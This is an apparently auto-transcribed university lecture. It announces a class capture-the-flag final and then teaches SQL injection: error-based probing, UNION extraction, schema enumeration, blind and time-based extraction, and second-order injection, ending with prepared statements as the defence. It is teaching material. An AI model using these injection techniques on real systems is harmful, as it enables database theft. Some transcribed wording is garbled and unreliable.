 All right, folks, let's get started. This beautiful Wednesday morning. OK, so the first thing I'm going to talk about is a scary thing. Who likes taking finals and exams? Who likes grading finals and exams? Watch out. He's my TA member in class, so I think he's buttering me up. Sideways is saying he definitely likes grading finals. All right, so here's what we're thinking. I want to get your feedback. Instead of having a final exam, we'll do a final CTF, a capture the flag. So the idea will be, so for those that don't know, a capture the flag is basically every team that participates is going to have their own system. You each have some Linux machine. Every system is running the same number of services, like a website and some custom software that we've written. The important thing is everybody's running the exact same copies. And so the idea is what your team has to do is to hack into everyone else, find the vulnerabilities in the services, exploit those vulnerabilities in order to steal a flag, which proves that you actually broke this service and this vulnerability. So there's a central system, we call it the score bot, who is continually going and setting flags every x minutes, like two minutes, five minutes, whatever. Then this way, let's see if I can throw a little flag. Yes, pretty good flag, right? So your team, yay. So you exploit this system, you steal this flag, and then you submit it to the scoring system, which says, oh hey, this is the flag for team, this is the flag for team not lead. That means you must, in order to get this flag, you must have broken this service, right? This service, let's say web, is the only one who can access this flag, which means that if you broke this service, if you have this flag, this means that you broke this service, right? And so I can give you points for it. So at the end of it, so there'll be a score board, which will show all the teams and their score, right? And the score is based on the, how do you spell? You spell pass. You spell check. It's not part of the handwriting, I'm finding. And so we will set this up so that we can play a final, a CTF during the final. So some of the things this will require, a laptop or a computer, if you do not have one. So A, let's talk about teams. So I'm thinking max six people, because otherwise it gets, there's too many people. It's an unfair advantage of having too many people. So maximum six people, no minimum, if you want, I mean, zero would be a minimum, right? It doesn't make sense. Does that mean we can register a team with no participants? No, it's a minimum one, let's say. Again, in our service they have a structure, right? So maximum six people, a minimum of one person. You can create your own teams, do whatever you want. One thing that I would maybe suggest is you're all working on different projects, right? Different kinds of defenses or offensive tools for different types of vulnerabilities. So if you try to diversify your team so that people are experts in different types of vulnerabilities, you're going to improve your chances of doing well. And the other thing is on your server, right? You can actually apply whatever defenses you will have root on this server. So you can do whatever defensive techniques you want to do, which include using your projects on the final CTF to protect your system or to help you exploit, if there's a format for your vulnerability, to help you exploit that. That's the high level idea. What do you think? Thoughts? Would you like the assignments or the time that you are? Yes. Yes, would you like assignment three for the time of the, well, it would be like assignment three, except you all are trying to hack each other, not one central thing. Do you want to do it for a week? No, we'll do the day of the final for the final time. I'll also leave it open for a while so you guys can still play with it. That would be totally fine with me. Yeah, but at least we'll do it day of, because I don't know, do you want to do, we could do like an eight hour thing. I feel like it's, because I think our final is on Monday of finals week, so that's a little bit of much to ask of teams, right? Normally it's like six or eight hours. Yeah, a normal CTF is eight, and we're from eight, eight is your to the minimum eight to like 48 hours. And that gets crazy if you have to like, sync up sleep schedules. And actually the best thing to do is get people under time zones so you're constantly working on problems. But yeah, we'll just schedule it just for the time. And I'll try to, this makes it tricky, I have to adjust the challenges and the services such that they're doable within that time frame, right? Other questions? Yeah, you already asked one. Where does web apps or binary? Both. No, both. Yeah, so you gotta think that you have to access these through a network, right? So everything will be networked. There will be either binary applications, which are networks or web applications, which obviously are network-created. So it'll be a mix of both, right? So that way it gives you incentive to prepare your web skills since we don't have a final on that, yeah. Who thinks that actually won't be possible? They won't be possible. It won't be possible. No, it won't be possible. No. Because I'm creating this network, so I will make sure that none of that was nonsense. Hopefully none of the nonsense I taught you can be used. If you find another nonsense that can be used, you should let me know. You are allowed to use all the open source tools. Yeah, anything you want. You can install whatever you want on the systems. I'll try to give you access, like at least a day or two before the actual final CTF, so that you can go in and configure things on your server. But you won't know the services that are running yet, right, until the day of, because that's kind of the puzzle. We don't want to release those early. Yeah. So will we have to determine what those services are or will we have some kind of list or? It will be in a standard format. So yeah, I'll probably work with Psy to get like a list of things that you do and things that you need to know, right? Once you get on the box, where are the services? Where, how do I restart services, right? If I want to patch them or something. How do I, what are these other services? Like what are the whole IP range of all the other teams? Right, what are the ports of the services? Those kind of things. Yeah. I assume that we pull in the systems and make sure the services are still alive on our box. We do that. Cause we can just walk it out and I think we'll be able to sort of get in. Right, yeah, right. So one defensive strategy is, well if you don't want anybody to hack you, you just shut down on your services, right? Like perfect defensive score. Fuck, that's super lame, right? Because well then, it defeats the purpose of the game, right? That's like, you think about game theory, well it's in everybody's best interest to shut down their services and so everybody shuts them down and so nobody can play, right? So continuously, yes, there will be a system that is constantly interacting with each of the services. So it actually goes back to patching, right? You can't just patch something by like wiping out all of the functionality of your application, right? The application still needs to function, you just need to patch that vulnerability. So yes, periodically the score bot will be actually checking each of these services and we do it in such a way that you can't distinguish who it's coming from, right? Because we're the game network. I can actually make it appear that I'm coming from one of the other teams, but really it's me, yeah. Well we know how many people have violated our services. Maybe, it depends on how much work I wanna do on the scoreboard. So by default, let's say no, but maybe as time goes on, right? But you do have root on here, you can TCP dump and see the traffic that's going on so you can see what's happening to your system. Maybe you can identify somebody else's exploit to reverse engineer it or to use it against them. Yeah? You have some kind of just example of how it all, I mean, kind of works, you know? Yeah, my hope is, I'm hoping at least, well, let's say by next Wednesday, because that's at least four, that's what, a little less than a week beforehand, I do wanna give you access to like a mini test network that hopefully we can do like a practice run with. So depending how we do on content, say one, make sure you get through cross-site scripting and SQL injection. Depending on how we do, maybe next Friday, like the last class, we'll do an in-class practice run of CTF with like dummy services or maybe project assignment three services. So that way you already kind of know how to exploit that. Yeah, that way we can get familiar with getting on there because you have to worry about SSHing in there and port forwarding and copying things. So, any other questions? So should we give this up? Do you wanna go back to that exam? Unrelated? Well, you said, I don't know about the top of my head, no. Let's get started. All right, I'll send out more details soon so we can make sure we do this. So, yeah, let's aim for teams by, let's say a week from now, like next Wednesday, I wanna know all the teams, so I will announce how to tell us that so I don't get tons of emails. Yeah, so self-organized, fine teammates, all that kind of good stuff. Or don't if that's your style. Maybe I'll use this diagram. Okay, so we talked about SQL injection vulnerabilities. So what is at the core of a SQL injection vulnerability? What does it allow, what fundamentally can attack, what's the cause? The cause is user input, in what way? Is every user input? What causes user input to? I think that means this is the input. What state is it? The query that you're meeting with the... So being able to essentially, the fundamental problem is an attacker can alter the SQL query that we're making to our server, the SQL server. That's fundamentally the problem. If it was not possible for an attacker to alter the query, then it wouldn't be, there is no SQL injection vulnerability. So how do we identify these? How can we identify SQL injection vulnerabilities? We look for in, let's say, buffer overflows. How do we identify buffer overflows vulnerabilities? By looking at the variables. By looking at, what about the variables? If their input is extending their buffer size. Right, so if variables were used, if some of our input was used to copy into another buffer and the length, either the length we get to control or the length was unbounded, what about without looking at the source? How could you figure out buffer overflows vulnerability without looking at the source? Yeah, you just try giving it a bunch of, all the ways it gets input, just try throwing a bunch of input into that, right? So now, so those are two different ways. What's the two different ways there? What do we have and what do we, right, so one way we're looking at the source code to find the vulnerability, or even looking at the assembly code if we're super late, right, to try to find the vulnerability. What about the third one? All right, so what about the other way? What about just throwing, do we look at the source code next? Right, so often, so in web applications, can we identify the source code or the web application? Yeah, not completely, and oftentimes not always, right? It could be, I mean, just, this is actually how the web works, right? We make a request, something happens, and it spits back an HTML page. We don't know what code ran to execute that request. Right, it could have been anything, so how can we, so in the web, we're actually interested more in how do we identify vulnerabilities without knowing, without being able to access the source code. Right, yeah. So if you send in certain information, certain data web pages, and you get an internal server error, would that be? Yeah, that could be one, right? That would be the analogy to the site fault, right? As you send some data and you are looking for a server error, right? And so, but then specifically, that's kind of the general way of how to do it, but specifically, how do I do that for SQL injection vulnerabilities? Take mark and it'll do what? Put it in a tick mark and it'll do what? And it'll create and execute it on the board, oftentimes it will back the SQL error. Yeah, so by putting in a single tick, right? We now are generating an, we are now generating an invalid SQL query. Guys, guys, okay. So by inputting a tick, so basically one of the ways is we wanna try to trigger a fault, right? And so we can do that by basically making the SQL query be invalid, right? So this is kind of what we can consider as a negative approach, a negative in the sense that we're trying to get the program to fail, right? If the program fails when we pass in like a single tick, then we know that there must be something wrong with this program, right? And it is probably using this in a query and something went wrong. If we're really lucky, we'll actually get the SQL error message that says, hey, there was an error in your query, there was an extra tick here. If we're not lucky, we may just get a 500 error that says, hey, something bad happened, right? But here I can try, hey, if I pass in, you know, add them for a user and I don't have a vulnerability and I get back a 200, but I pass back a tick and I get a 500, then that means there must have been some kind of, there's probably a SQL injection vulnerability somewhere. So it'll be the opposite. What would be like a positive approach? By saying, I'm one equal to one. And one equals to one. So yeah, why would that be a positive approach? So does it, so let's think about it this way. Will it cause the query to fail? Yes. Or sorry, sorry, sorry, that's a good one. Will it cause an invalid query to be issued? And one is equal to one? Well, you may have to have comments, maybe two. And that depends on the tick, right? We may want tick and one equals to one. So it may, so you're saying we want the result to fail, like a return zero rows instead of how many rows before, but the query is still a valid SQL query, right? Exactly, yeah. What do you and one equals to two? So it's getting on and like we know that the username equals to the valid username and one equals to two. If it just gets failed, then we can move it. Yeah, the first five is working fine. But how do we know it's actually a username, right? We may not know what it's actually testing for, right? I mean, because it could concatenate things, right? We may not know, but yeah, that's the general idea. Is the other way, for one example, right? Let's say we just search for something with an ID, like select star from users where ID is a parameter, right? So if I pass in 17 plus five, that should return no users if it was probably escaped, right? So it's gonna look for a user with the ID of 17 plus five, but if it's not escaped, right, then it's gonna return me the user who has ID of 22 because SQL will do that addition for me, right? So yeah, so the idea is you're trying to find different behavior from the system, but not one that says, hey, this is an error SQL query, but something that actually shows that the SQL server is processing your results. Okay, so we saw kind of how we can maybe use the tick or one equals to one to bypass maybe some login mechanisms, right? Essentially there we can make any query true, right? But how do we actually get data back, right? We want to be able to extract data from the server, from the database, right? I told you I just kind of sold SQL injection vulnerabilities as the promise of you can download the entire database, you can get all the information from the database, right? But if we're just setting a query to be true, how do we actually do that? So the idea comes in with the union operator. So anybody who's very familiar with databases want to tell us what the union operator is used for? Combine what? Yeah, combine multiple queries into the same result, right? So we can do a, so the idea is the union operator merges the results of two separate queries. So we can say, hey, select ID from, well, that's not a good example, huh? Coming up with database example on the fly apparently not my forte, let's see if I have examples, right? Here we go, okay. So here I'm selecting, so repeat one, A one is a SQL function that will just repeat one, sorry, we'll repeat A once. So let's return A, union select, repeat B 10 times. So this, the result is going to be A and it should be 10 Bs, right? And it's going to return all of those A's and B's as if it was one query that's like the A's and the B's, right? And the very important thing here is that the queries don't have to have, well, they have to have very few relations with each other, right, so I can select from users and I can union that with a select from customers and union that with a select from the product table. And so we can actually use this, right? So oftentimes we're going to be inside a select statement where we can alter the SQL query. And remember, the important thing is wherever we can inject, we can't change anything that happens before it, right? We can only change the query of what happens after that query. So if the original query is something like this, like select IB name and price from products where a brand is equal to tick B, right? This is easily something that developers write and do literally all the time. Yeah, honestly, if you can do like GitHub searches for something like select and then a wildcard where something equals a dollar sign like underscore get, like to look for who's using get global variables inside these strings, you'll find a lot of stuff because everything is terrible. So here, do I really care? So here, right, if I do tick or one is equal to one dash dash, what's this query going to return? It's going to return a blank row. Tick or one equals one dash dash. Yeah, it's going to return everything, right? It will return every product in my database, right? Which is good, right? I mean, that could be information that we want as attackers, right? But do we really care about the products? I mean, we can just scrape their webpage and view all their products anyways, right? What do we care about? Users, credit cards, yeah, we want to get other information from the database that we shouldn't really have access to. So our goal is we want to add a union clause after here that unions with other things from other tables. So we can union this with a select, let's say username, ID username password from users and then it will first fetch all the products from the product table, then it will fetch all the users from the user table, concatenate those results together and return it all and it will show us whatever this is being used in the web output, like let's say this gives us a list of products, it actually gives us the list of products and also new products that look as if they're users. Tables, so like you're querying what all the tables are in the database typically? Yes, yes, I think it's a database-dependent technique if I recall correctly. You change this database to database but I don't all have it, I mean from Oracle to MySQL to SQLite. Right, so yeah, so you can use this, I mean, so if you already know the tables that you wanna get to, you can use this. But yeah, you can also use meta information that the database has to query those to say what database do you have, what tables do you have or the schemas of those tables. Right, so we can actually include that in here. So the idea is here, if we modify the square, if we pass in as B, food, tick, union, something, then it becomes select ID name price from products where brand is equal to food, union, select user pass null from accounts dash dash. So why do I pass in null as a third parameter here? Yes, so I said that the select queries are distinct, they're distinct except that they must return the same number of columns. So this is saying, so basically this has to say we need three columns. If we need a user pass in null, or here it means ID name price, but here we're saying the three columns are user pass in null. And so, okay, does this mean that now we're kinda screwed, we have to know exactly the structure of the query parameters? I think also they have to match type. Yes, so that's the other thing, so the types actually have to be the same, right? Or I think it depends on the database system actually. So yeah, the types need to be the same, like you may not be able to use an int where you're using a string. The nice thing about the null is that the null is type compatible with everything, right? So we can use null here. And so yeah, so here we would have to know, so there's two problems here, right? We need to know beforehand the structure of the query, what does the query look like? And we need to know the names of the table we want and the columns. But we don't know this from the outside, right? All we know is we found a SQL injection vulnerability, we're relatively confident that it's being used in a select, right, in this select statement. We changed the brand, we passed in a tick for the brand and we saw it crash, right? And then we passed maybe tick space or one is equal to one dash dash, and that caused it to return all of the product. So now we know we're good. Now we know we're injecting into a select statement. But now we want to use a union, right? So then do we have to break into their website to read their source code to find out exactly what that query is? No, although, you know, we probably, SQL injection vulnerabilities wouldn't be as cool if we had to do that, right? So here we have other ways. So the idea is we want to be able to determine A, the number, and B, the type of the select parameters, right, in the SQL query or the columns, the number and type of the columns, right? The idea is we can actually use this idea of testing for when things crash, right? So first we can do union select null, right? This query will fail, it will throw an error if this query, if the original select statement only has more than one column, right? But it will be true if it has, it will succeed if there's one column, right? And we can just keep doing this until we finally get something that works, right? And it's not gonna be, I mean, that could be like 20 or whatever, you're a programmer, you can script this, right? You don't have to do this one at a time. Although you can, at most what, 100, I would say, maybe? You're gonna get there eventually, right? And we can actually use a similar technique to determine the types of the columns, right? So the idea is first we have all the nulls, right? So now we know exactly how many columns there are going to be. So if we wanted to detect which one was a string type, right? If we said we didn't find it as three, it has three columns, which put in a constant string for one of the columns. And if that succeeds, we know that that is a valid string type. If it doesn't succeed, then we would try maybe a 10 or a constant, maybe integer, and we could move this foo to the other, any of the other ones. So we could try it in all possible places to identify the types of all the columns, yeah? Just a big point, what I was thinking, if the server is valid, and it's handling exceptions very well, how do you do it like this? Maybe it was working on the blind single injection project, a few of you. Yeah, so right, the blind single injection, that's exactly what it is about, is how do you do this when you get absolutely no difference between a failed query and a correct query? We'll get into this. The idea is you can still do this, right? You can still, and what you do is you add, well, one thing you can do, one typical thing that they do is they'll add a sleep command, like function call, so that that way will cause the SQL server a delay in the response from when they sent the query versus when it fails or it doesn't fail. That's kind of the standard way of doing it, yeah? It's also positive, right? Because the query's gonna work on the null once you finally hit it. Even if it doesn't give you anything back, you know your original query's your base. But the problem is, how do you know the difference between success and failure? Success is when you get that row back. Ah, but he's talking about the case where the web application internally is using that, but it is not externally showing any difference in behavior. Oh, so it's an internal. Yeah, it catches the MySQL error and it just keeps going like nothing ever happened, right? So you have no difference between the two, right? That's all the blind because you, you know, you have no way to tell the success so you have to develop other tricks to do that. And it's mainly about changing the execution. But even with that, even if you can tell that one thing, so A, so the trick there is that A, you can change, you can use these techniques to kind of figure out the query and the select, but you're actually doing a union doesn't make sense because it never returns the results to you, right? It's blind in that sense too is where you don't, A, you don't know when it fails and B, you don't get the results. But using the sleep technique, you get one bit of information which says this was a valid query or this query's condition was correct. So they use, you can use techniques just using this one bit of information. You can ask questions like, is there a column? Is the, let's see, what can you do? You can say things like, is there a take, is the first table in the database's name? Does it start with a letter that's greater than what's the middle of the alphabet? The middle of the alphabet, is it T? Is it greater than T? So you can ask that question and if it is, then you'll sleep. If not, you won't sleep, right? So that gives you that one bit of information that says, okay, the very first character's name of this table is greater than that. And then you do a binary search to figure out exactly what that character name is and then you do the second character and the third character, fourth character, fifth character. Finally, you've gotten the size of the table with the name of the table, right? And then you can start asking about columns in that table. It's the exact same technique. And then you extract data from the table that same way. Yeah, it's really cool. I mean, you can't do it. You gotta do an automated tool to do it. But once you have it, you just keep doing it and it can extract and download the entire database, right? So now, okay, so now we know the size of the things that we know the number of columns that are expected in the select state. And we know the types. Now we need to go, I think Eric made the point about determining the name and the column names. So we're gonna use database specific techniques to extract the names of the tables and the names of the columns, right? So what, why do these have to be database specific? Why do we want to know these? Let's go with that. Okay, sorry, new question. This is the original question I wanna ask. How do we know what database they're running? The posting system, but odds are right now probably MySQL or... Yeah, so we can guess based on the frequency, right? What are the things do we guess? Yeah, if we saw any database errors, right? The different database errors are gonna give us different strength, right? We can actually, even if it doesn't tell us the query, we can probably search for the error that it gave and we would see, oh, this is a MySQL error or this is a Postgres error or an Oracle error, right? What else, yeah? Every database has its own dialect of SQL so you can use that dialect to structure a query and whichever query works, I mean to see the di-dialect as well. Yeah, right, so every, so SQL is like the standard language that each database system has its own dialect of SQL. It has some functions, like for instance, I believe on MySQL, a hash will do a comment at the end of the line, but that doesn't work in SQLite, I believe. And so you can use those kind of things to basically do detection of what database system is it, right? Your execute queries, you can call what you know is a MySQL function, right? And if it doesn't exist in the other databases, it will fail. So yeah, there's techniques you use that is determined. A simple scan would also tell you what kind of service is someone doing so. How can you scan for the outside though? I mean, you can see this service is running on port 3306. Yeah, the port, yeah, if it is 3306, it will realize it. But how do you know you're outside? You're only talking to the web application, right? We can get the domain IP, right? Do you think it would be a wise idea for an organization to allow you to access port 3306 externally? If people follow the port scan, then you might get your port ready. Yes, I totally agree. If you have that information, I will say it's highly unlikely. I mean, that's a whole other level of incompetence because you should, your MySQL port should not be globally accessible to anyone, right? Then you could see what version they're using and see if there's a remote exploit for that, right? You could do other cool stuff. Yeah, so often you're not going to know from the outside because they won't tell you, right? Normally, in the web context, we assume we have access to port 80 and that's it. Are there some blacklisted, even in the AWS or the Internet machines? Right, yeah, so that's what we assume kind of as they have this architecture, right? Where we can make external request to port 80 that does some processing somewhere and then internally it's making either a request to a database server or the local database on the machine and then returning a result, yeah? Cloud services and services like that, the developer has to set up the database usually separately so that might be the way for the hacker to try it and guess their password or something like that. Yeah, if it's globally accessible, you have a host of other problems. Yeah, I would just try to brute force your password. I'm sure it's not that good, right? Just try admin, admin, database, database. So anyways, once we figure out we can use these database specific techniques. So in Oracle, there's a user objects table that we can extract information about table. We can extract the names of columns associated with that table. In MS SQL, there's assist objects table, which we can do the same thing. And in MySQL, there's information schema.tables and information schema.column. So using this, it's actually kind of cool, right? Because they allow you access to this information from the SQL language itself. And that is a query that we're building is in SQL. So we can use SQL to query these tables and extract information about them. Okay, we'll just talk about this. So blind SQL injection, right? Prohibit error message displays. And it's not enough. So the idea is, yeah, as long as we can extract, so I guess there are levels of blind SQL injection. So let's say like this case, we have press releases that we can access. It queries from the database, like title description from press releases where ID is equal to five, and all error messages are filtered, right? So it doesn't send any error messages. So we can't actually, so here we maybe get a 404 or a page, right? That would be that bit of information that tells us whether the query was actually parsed or not. But it's not like we can use this to extract more information, like using the union case. But still, so here this would give us, so by injecting five and one is equal to one, right? So why five and one equals one? Where's my tick? They're directly importing a number instead of a string, so you don't have to do that. That's the other key thing about SQL injection vulnerability. So oftentimes people only think about single or double quotes, right, and forget that there's a whole, what matters is how is this input being used in the SQL query? Here it's being used here as ID equals this, and the developer chose not to put it in single quotes. And so because of that, if you put a single quote in, you're gonna cause an invalid SQL query. And so here, this is why I do five and one is equal to one, right, because that just injects in there. There's no additional ticks being happening. And so then this query gets sent to that place. Title description from press releases where ID is five and one equals one, right? And so I'm adding and one is equal to one, why and instead of or here? I don't know the valid ID as well, not just. Right, I already know five is a valid ID, right? If I did or one equals the one, who knows what the application's gonna do when it gets back a thousand press releases, right? It probably is only expecting one back, so it could throw an error or something, right? So here I'm saying if it returns the exact same page with five and one is equal to one, well then I know that must be a SQL injection vulnerability, right? This is a case of reusing the positive identification technique, right? We're saying if it does this, right? If it was properly escaping things, it would not return the same query, right? It would not return the same press release. It would look for a press release with an ID of five space and one equals one, which is clearly not a valid press release or it's not a valid ID. Okay, so if there's a SQL injection vulnerability, then the same press release should be returned. Otherwise, if the input is validated, right? If it's sanitized, then ID equals five and one equals one should be treated as the value. So the idea is we always know one equals the one is true, and so we can inject statements, I'm gonna say about this, but we talk about this. So yeah, so we can ask questions from the server, right? We can say five and username is equal to hacker, right? So if it returns false, well it's not really giving me a lot of information, it's telling me that the username is not hacker, which is not great information, right? But if it returns one, hey, I've guessed the username, right? And so by making complex questions, right, we can do binary search, we can ask interesting questions of the database system to extract bit by bit information from the system. We can say, yeah, so here we'd say, ID five and substring of username one one, so get the first substring of the username, the first character of the substring, is it less than, let's say this ASCII value question mark? And so that returning the true or false that tells me information about this value. Okay, the other really cool part about C1 injection vulnerabilities, so often time when we think about it when we're testing these things, right, we think, okay, input we get into the application, goes into the database, used in a SQL query, right? Goes into the database means used in a SQL query. So if that is, happens incorrectly or is not sanitized, then we can have a SQL injection vulnerability, right? So that data directly coming from the user and then going into the database. But what if they properly sanitize the data when it's going into the database, but then later in a subsequent query, they query that data and then use that data unsanitized in a new query. Like let's say I wanted to find, like in the course submission system, right? Let's say I wanted to find all users with, let's say similar names or something, right? Let's say I was safe when I got all your names in so they could have ticks or whatever, right? But then let's say I wrote my query as, well, first select all the user names of the database, then create a new query to select all other users that have the same username, right? And the ID is not your ID, right? So look for people with other similar user names, right? Here I'm using data from the database that originally came from the user, which is untrusted, unsanitized. It just happened to be I was safe when it was coming in, but the second time I'm using it, it's not safe. So ID is SQL code or a SQL injection commander attack is injected into the application, but that SQL statement isn't invoked until later in the program when the application uses that data. And it could be, you know, it could be one of, it could be anything when a cron job runs, like on a guest book page or a statistics page or anything like that, right? So you could have a guest book or guest write comments and then a statistics page that kind of shows how many people are writing comments. So the idea is, right? Because when you escape single quotes by putting the data into the application, you still have single quotes in data in the database, right? When it's on the database pulls that data out and uses it, it came from the user, it's untrusted. So the attacker can set their username as something like John tick dash dash, right? So the application, when it inputs it into the database, safely escapes that tick by putting a slash there. But at a later point, the user changes their password and the query uses that username in the database. So it says update user set password equal to whatever where username is equal to John dash dash, right? So now I've changed John's password, even though my name was John tick, right? So I can make a name of admin tick dash dash, right? To be able to change the admin's password and then be able to log in as admin. Let's look at an example. So here's a register page. So here we're starting a session in PHP. We have the SQL query of uncertainty users, username, password, values, name and password, right? And we're using the MySQL real escape strings functions, which is how you do validation and encoding with MySQL in PHP, right? So we query, you do this query, we check, and then we set it into the session, right? So here we're properly made built in the query, right? This is 100% safe. There's no way they can change our query that we intended on the MySQL query, right? There's no way they can change that SQL variable. But now on the change password page, let's say now I have a new password and I select the username and password from users where ID is the session ID, right? And the session ID was set. So A, it's stored on the server so the user can't control it. B, it is just an integer, so it's gonna be safe. So we did not, nope, we did not call MySQL escape string here, right? But we know it should be safe because the user should never touch it, but maybe we should probably add that here just to be extra sure, just in case. So then I fetch this result from the database, right? So I do this initial query, right? I make this query, I get the result back, and then I query to update the user set password able to MySQL real escape string new password, right? And here I'm being really careful. This new password came directly from the user, right? I need to escape it before I put it into the database, but I just got this username back from the database so what's the problem of inserting it directly in here? And then I issue this query, right? So the key about second order, SQL injection vulnerabilities, it could be end order, right? It could be end number of sets where it's used and put into some other database or put into another table or something, right? But the core idea here is that just sanitizing things that they come in is not always enough, right? That data could still be, we like to think about it as tainted, right? Anything that comes from the user is evil, bad, tainted, until we make it good by calling this MySQL real escape string, right? So we make it good to insert once, right? But if we ever use that data again, it's still tainted, it still came from the user. Okay, so how do we solve SQL injection vulnerabilities? How do we place the queries? Primed or Esquire? What are primed or Esquire's? So you have like Facebook and Esquire's like all the real stuff. Yeah, so really fundamentally, right? Our goal as developers, in order to never allow SQL injection vulnerabilities, we cannot let client-side data, right? Data that comes from the user to modify SQL statements, right? This is the core SQL injection vulnerability problem, right? One way to do that is by using stored procedures, right? So stored procedures are a way to isolate the applications from SQL. They actually are a way that you tell the SQL server, hey, or actually, sorry. Yeah, stored procedures, being confused between stored procedures and prepared statements. So what was the one you said? Primer, trace, queries. Primer, trace, queries, yeah, like prepared statements. Okay, so stored procedures, right? Some databases you can put functions into SQL and then you can just call those functions from your application, right? So this way, all the SQL statements that are required for your application, your application doesn't build up SQL queries. It uses the functions that are defined into database. Prepared statements, the idea of prepared statements is your application tells the database, hey, I'm about to make a query and here are the placeholders of where I'm gonna put data. And then the SQL server pre-processes and parses that query and says, okay, great. Let me know when you have the data. And then you say, hey, here's the data. The first parameter is this, the second parameter is this. And so the idea is that the statements are compiled and parsed before the user input is added. So you're separating this process. And so really prepared statements are basically the way to go. This is the only way to absolutely ensure that you have no SQL injection vulnerabilities. Because you're providing the structure of the query first and then you're providing the arguments so those arguments cannot change the structure of the query, right? The SQL server has already parsed it, it already knows exactly what it should be. So an example of this in PHP. So here I'm selecting all from users where username is equal to colon name. So this is just a placeholder and password is equal to shout one concatenate password with salt limit one. So now I'm preparing this statement. So the colon name and the colon pass, right? These are just placeholders that tell the SQL engine, hey, I will put in, I'm gonna give you the values of name and pass and here's where I want you to use them. But parse this thing now, right? Get the structure of this query now and then bind name to colon name, bind pass to colon pass and then execute the query, right? Now there's no possible way that name and password can ever alter the structure of this query. So what's the difference between this and the other way? The name of the password, are you gonna say some good statements for here? Yes, from a program perspective, which is easier. Yeah, the other way, right? And you can see that's why that's what developers go to, right? I mean, they, you can do it in one line, right? You can do my SQL query string with embedded dog sign name, dog sign pass, right? And it's exactly what you mean. That's what you wanted. You want the query with the data represented here, but here you have to do it. You have to take one statement, four statements, right? You have to prepare it, you have to bind and then you have to execute, right? But this is the way you have to do it and we're gonna be 100% sure. The other way you have to do it is you have to make sure absolutely anything that touches a SQL query has to be sanitized, right? But that's actually a much harder task than doing prepared statements, right? This is fundamentally correct. This is kind of just a workaround in a bandaid. You're like, well, I don't really want to use the proper way to do it, right? Because think about it. Let's say that we do use the MySQL real escape string, right? But we're using it without being surrounded by single quotes, like in that user ID example, the press release example, right? Here, even if, where's nothing? There you go. Select title description for press release where ID equals, right? We have no ticks around here. So even if we real escape this, we can add spaces and we can add and then we can add space and we can add one equals one, right? We just can't add single quotes or some other characters. We can still have a single injection vulnerability here, even though it looks like it is correct and that you properly sanitized everything. So because you did not use the single quotes to capture the input, this problem will not exist using prepared statements. That's why prepared statements are a better way to go. All right, so let's stop here and we will talk about process scripting vulnerabilities on whatever that next day is.